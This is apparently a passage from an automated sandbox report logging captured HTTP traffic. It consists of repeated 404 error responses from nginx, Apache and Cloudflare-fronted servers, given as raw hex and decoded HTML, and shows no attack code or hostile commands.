6e 15 3a c2 40 c8 ec 82 f3 4d 14 38 36 f0 0b 3f de 06 07 4e a6 6e 7d 3d bf ff 70 be 65 37 59 cd 58 15 e7 42 98 32 fb a6 47 72 c0 c8 81 99 ae f3 5d 39 b7 f3 eb a7 e3 87 ed e7 3e 4e 87 02 fe 77 3f b3 70 66 eb ed e7 b6 63 f5 de 71 7f f2 86 6f f9 76 86 20 44 88 d1 7b e5 dd dd dd 99 9c 62 a7 b7 9f 9b 56 42 0d 48 d1 14 38 0a e7 b9 4d 1d e9 43 12 f4 32 e3 26 32 a1 09 07 d7 82 53 7f fb b9 f9 5c 7e f9 57 f9 7c fb 0b 6f fa 09 fe 82 b6 cb 4f f7 c7 9d b6 e0 e6 20 39 bf 6c 8d 80 51 06 c2 52 ff 7c b3 40 31 61 c3 c1 e2 e6 87 7a 43 54 9e 6e 1f ee bf 6b 6a 86 cf 0f e3 90 26 1d 85 82 f6 4b 53 60 9d 5f 40 2c c7 be af 13 cf 85 b9 0f c2 9e f3 f8 4a 6a 07 4f 9f df 68 c7 65 ab 64 fc a1 26 0e 79 02 ad 3a 37 79 79 bd 8d 92 69 95 49 a2 98 b3 cf f6 4e 68 11 8c 59 ec e9 d6 55 f3 a6 8e bf f4 19 b5 d6 9b b7 af 5f 47 d4 fa ee 1e fa 7e ba 36 e5 60
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 17 Jul 2024 07:06:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Httpd-Modphp: 1Host-Header: 6b7412fb82ca5edfd0917e3957f05d89X-Proxy-Cache: MISSX-Proxy-Cache-Info: 0 NC:000000 UP:Data Raw: 31 33 64 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 25 37 43 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 7d 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 66 69 74 2d 77 69 64 65 20 7b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 32 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 17 Jul 2024 07:06:55 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 17 Jul 2024 07:06:57 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 17 Jul 2024 07:07:00 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 17 Jul 2024 07:07:03 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Jul 2024 07:07:09 GMTServer: ApacheContent-Length: 551Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 70 61 67 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4c 61 74 6f 3a 34 30 30 2c 31 30 30 2c 33 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 70 72 69 6e 63 69 70 61 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 65 72 72 6f 72 22 3e 0a 20 20 0a 3c 68 31 3e 4f 6f 70 73 3c 2f 68 31 3e 20 20 0a 20 20 3c 70 3e 54 68 65 20 50 61 67 65 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 6e 27 74 20 68 65 72 65 2e 3c 2f 70 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 61 75 72 61 5f 31 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 61 75 72 61 5f 32 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2e 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 page</title> <link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Lato:400,100,300'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="cont_principal"><div class="cont_error"> <h1>Oops</h1> <p>The Page you're looking for isn't here.</p> </div><div class="cont_aura_1"></div><div class="cont_aura_2"></div></div><!-- partial --> <script src="./script.js"></script></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Jul 2024 07:07:12 GMTServer: ApacheContent-Length: 551Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 70 61 67 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4c 61 74 6f 3a 34 30 30 2c 31 30 30 2c 33 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 70 72 69 6e 63 69 70 61 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 65 72 72 6f 72 22 3e 0a 20 20 0a 3c 68 31 3e 4f 6f 70 73 3c 2f 68 31 3e 20 20 0a 20 20 3c 70 3e 54 68 65 20 50 61 67 65 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 6e 27 74 20 68 65 72 65 2e 3c 2f 70 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 61 75 72 61 5f 31 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 61 75 72 61 5f 32 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2e 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 page</title> <link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Lato:400,100,300'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="cont_principal"><div class="cont_error"> <h1>Oops</h1> <p>The Page you're looking for isn't here.</p> </div><div class="cont_aura_1"></div><div class="cont_aura_2"></div></div><!-- partial --> <script src="./script.js"></script></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Jul 2024 07:07:15 GMTServer: ApacheContent-Length: 551Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 70 61 67 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4c 61 74 6f 3a 34 30 30 2c 31 30 30 2c 33 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 70 72 69 6e 63 69 70 61 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 65 72 72 6f 72 22 3e 0a 20 20 0a 3c 68 31 3e 4f 6f 70 73 3c 2f 68 31 3e 20 20 0a 20 20 3c 70 3e 54 68 65 20 50 61 67 65 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 6e 27 74 20 68 65 72 65 2e 3c 2f 70 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 61 75 72 61 5f 31 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 61 75 72 61 5f 32 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2e 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 page</title> <link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Lato:400,100,300'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="cont_principal"><div class="cont_error"> <h1>Oops</h1> <p>The Page you're looking for isn't here.</p> </div><div class="cont_aura_1"></div><div class="cont_aura_2"></div></div><!-- partial --> <script src="./script.js"></script></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Jul 2024 07:07:17 GMTServer: ApacheContent-Length: 551Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 70 61 67 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4c 61 74 6f 3a 34 30 30 2c 31 30 30 2c 33 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 70 72 69 6e 63 69 70 61 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 65 72 72 6f 72 22 3e 0a 20 20 0a 3c 68 31 3e 4f 6f 70 73 3c 2f 68 31 3e 20 20 0a 20 20 3c 70 3e 54 68 65 20 50 61 67 65 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 6e 27 74 20 68 65 72 65 2e 3c 2f 70 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 61 75 72 61 5f 31 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 61 75 72 61 5f 32 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2e 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 page</title> <link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Lato:400,100,300'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="cont_principal"><div class="cont_error"> <h1>Oops</h1> <p>The Page you're looking for isn't here.</p> </div><div class="cont_aura_1"></div><div class="cont_aura_2"></div></div><!-- partial --> <script src="./script.js"></script></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 17 Jul 2024 07:09:12 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-07-17T07:09:17.2735471Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 17 Jul 2024 07:09:15 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 18X-Rate-Limit-Reset: 2024-07-17T07:09:17.2735471Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 17 Jul 2024 07:09:18 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-07-17T07:09:23.8501934Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 17 Jul 2024 07:09:20 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-07-17T07:09:25.9981867Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Jul 2024 07:09:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 8a486811c951c3e4-SEACF-Cache-Status: DYNAMICCache-Control: no-cache, must-revalidate, max-age=0Content-Encoding: gzipExpires: Wed, 11 Jan 1984 05:00:00 GMTLink: <https://goodneighbor.club/wp-json/>; rel="https://api.w.org/"Vary: Accept-Encodingki-cache-type: NoneKi-CF-Cache-Status: BYPASSki-edge: v=20.2.7;mv=3.0.6ki-origin: g1pX-Content-Type-Options: nosniffX-Edge-Location-Klb: 1Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EU09wMy6vPMz8LmnHKPm0kfjfHOy4%2BzKMtBu%2BhViO120vVtbjHgCHbBWMprX4heViYO4mMDmeojSq4H%2BDMN%2F0%2BcMBBICEkXnFooXkCcGro9dxwlV8GAdezowpqvYuuaHW76%2BzMPV7Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server: cloudflarealt-svc: h3=":443"; ma=86400Data Raw: 31 64 63 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd eb 9a db 38 92 28 f8 db fe be 7d 07 9a e5 4a 49 9d 24 53 52 5e 6c 4b 96 7d 5c 2e 57 b7 67 7c a9 f5 a5 fb f4 38 fd e9 50 22 a5 a4 4d 89 6a 92 ca 74 b6 ac 7d 8d 7d a0 7d b1 8d 0b 00 82 37 5d 32 5d 3d 33 df 39 ae ee 14 09 04 02 81 40 20 10 11 00 81 c7 f7 bc 68 9c 5e 2f 7c e3 22 9d 85 4f ee 3e c6 1f 23 74 e7 d3 81 e9 cf ed 8f ef 4d 4c f3 5d ef c9 dd 3b 8f 67 7e ea 1a e3 0b 37 4e fc 74 60 7e fc f0 9b fd d0 54 e9 73 77 e6 0f cc cb c0 bf 5a 44 71 6a 1a e3 68 9e fa 73 80 bb 0a bc f4 62 e0 f9 97 c1 d8 b7 e9 c5 32 82 79 90 06 6e 68 27 63 37 f4 07 1d c2 12 06 f3 af 46 ec 87 03 73 11 47 93 20 f4 4d e3 22 f6 27 03 f3 22 4d 17 49 ef e8 68 3a 5b 4c 9d 28 9e 1e 7d 9b cc 8f 3a 5c 28 0d d2 d0 7f f2 bb 3b f5 8d 79 94 1a 93 68 39 f7 8c 83 9f 1e 76 3b 9d be f1 e7 28 f2 8c 37 7e 30 bd 18 45 b1 f1 3c 5c 8e 1e 1f 71 81 bb 1a cd 8d 38 1a 45 69 d2 50 14 37 66 ee 37 3b 98 01 4e 7b 11 fb d8 a2 5e e8 c6 53 bf 61 1c 41 c1 64 1c 07 8b f4 c9 55 30 f7 Data Ascii: 1dc08(}JI$SR^lK}\.Wg\|8P"Mjt}}}7]2]=39@ h^/\|"O>#tML];g~7Nt`~TswZDqjhsb2ynh'c7FsG M"'"MIh:[L(}:\(;yh9v;(7~0E<\q8EiP7f7;N{^SaAdU0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Jul 2024 07:09:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 8a486822d9aa9b78-SEACF-Cache-Status: DYNAMICCache-Control: no-cache, must-revalidate, max-age=0Content-Encoding: gzipExpires: Wed, 11 Jan 1984 05:00:00 GMTLink: <https://goodneighbor.club/wp-json/>; rel="https://api.w.org/"Vary: Accept-Encodingki-cache-type: NoneKi-CF-Cache-Status: BYPASSki-edge: v=20.2.7;mv=3.0.6ki-origin: g1pX-Content-Type-Options: nosniffX-Edge-Location-Klb: 1Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CMHEQuulRxD6cZw757LIJi86fJOSX8cwN4nVkX1VA60bH7o32%2Bx1iVHLB1AePazAoFLI0uJHxParPWgeS2rwhCIAq9Vrr92zP2rtlGKaluikzzbXaaTDZyG3iU%2FJ%2BEl4FtS1CGBUCw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server: cloudflarealt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Jul 2024 07:09:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 8a486833ebf76824-SEACF-Cache-Status: DYNAMICCache-Control: no-cache, must-revalidate, max-age=0Content-Encoding: gzipExpires: Wed, 11 Jan 1984 05:00:00 GMTLink: <https://goodneighbor.club/wp-json/>; rel="https://api.w.org/"Vary: Accept-Encodingki-cache-type: NoneKi-CF-Cache-Status: BYPASSki-edge: v=20.2.7;mv=3.0.6ki-origin: g1pX-Content-Type-Options: nosniffX-Edge-Location-Klb: 1Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kw6OU28pGMZRmj07iLbDpzwqVV6M4he7KwsLz%2FEspdbxdu8XObcwytw%2FLmpFRa3S3n5GWdLvJVkGvwp%2BRzfpkpFAzJ1qHQ%2FcZT44MEOig4h09oj3rxYlVOho7uH5KnDyxg4j%2FiZ8qQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server: cloudflarealt-svc: h3=":443"; ma=86400Data Raw: 33 35 35 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 